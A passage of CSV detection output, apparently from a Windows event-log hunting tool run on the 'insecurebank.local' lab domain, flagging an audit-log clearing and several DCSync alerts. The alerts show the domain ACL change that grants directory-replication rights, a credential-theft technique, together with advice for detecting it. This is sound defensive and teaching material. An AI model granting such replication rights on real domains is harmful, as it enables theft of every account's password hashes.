-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-11-15T08:19:02.298512Z"">
</TimeCreated>
<EventRecordID>25048</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""748"" ThreadID=""6064"">
</Execution>
<Channel>Security</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1005675359-741490361-30848483-1108</SubjectUserSid>
<SubjectUserName>bob</SubjectUserName>
<SubjectDomainName>insecurebank</SubjectDomainName>
<SubjectLogonId>0x1c363a4</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",alice.insecurebank.local,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242601</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b7
6-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User ( bob ) modified the nTSecurityDescriptor of the domain object; the written ACL contains DS-Replication-Get-Changes/-All ACEs (1131f6aa/1131f6ad) which enable DCSync - verify which SIDs hold these rights and correlate with 4662 replication events from non-DC accounts,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242600</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User ( bob ) modified the nTSecurityDescriptor of the domain object; the written ACL contains DS-Replication-Get-Changes/-All ACEs (1131f6aa/1131f6ad) which enable DCSync - verify which SIDs hold these rights and correlate with 4662 replication events from non-DC accounts,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242599</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">77B63738-C25C-4FBD-BA96-A7ABE17A22A3</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User ( bob ) modified the nTSecurityDescriptor of the domain object; the written ACL contains DS-Replication-Get-Changes/-All ACEs (1131f6aa/1131f6ad) which enable DCSync - verify which SIDs hold these rights and correlate with 4662 replication events from non-DC accounts,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242598</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">77B63738-C25C-4FBD-BA96-A7ABE17A22A3</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
